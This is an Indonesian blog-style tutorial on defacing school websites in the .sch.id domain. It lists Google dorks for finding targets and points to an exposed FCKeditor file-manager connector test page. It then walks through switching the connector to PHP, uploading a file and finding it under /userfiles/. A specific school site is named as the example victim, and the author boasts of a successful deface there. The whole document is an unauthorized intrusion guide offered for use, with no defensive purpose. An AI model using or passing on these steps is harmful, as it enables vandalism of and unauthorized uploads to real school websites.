Oke, kali ini saya akan share trik lama yang aneh nya masih bisa di paake sampe sekarang !!! disini kita akan deface website sekolah contoh nya yang beralamatkan Sch.id ..
Keren kan ?? Mari simak langkah langkah nya dibawah ini
Langkah-Langkah:
- Siapkan File Format .txt ( bisa anda buat di notepad )
- Buka Google, lalu masukan dork :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
Terserah sobat mau pilih yang mana. Sebagai contoh admin pilih ini aja
http://sman1kotabaru.sch.id
3. Exploit:
/editor/filemanager/connectors/test.html Kalo bingung masukin Exploit nya, ini contohnya
eX : http://sman1kotabaru.sch.id dimasukin exploit jadi
( http://sman1kotabaru.sch.id /editor/filemanager/connectors/test.html ) kalo udah tekan enter
Nah sekarang di kolom Connector yang defaultnya ASP jadikan PHP trus resource type nya ganti file. Trus klik Browse....... cari file.txt sobat..........kalo sudah klik open dan klik Upload
http://www.[site].sch.id/userfiles/file/namafilesobat.txt
http://www.[site].sch.id/userfiles/namafilesobat.txt
jadi punya saya masuk di
http://www.sman1kotabaru.sch.id/userfiles/HBD.txt bisa di klik untuk melihat hasilnya :D
Selesai :D Kamu telah berhasil men-Deface nya walaupun bukan di Index nya (oops :)
Semoga Berhasil dan Semoga Bermanfaat ^_^
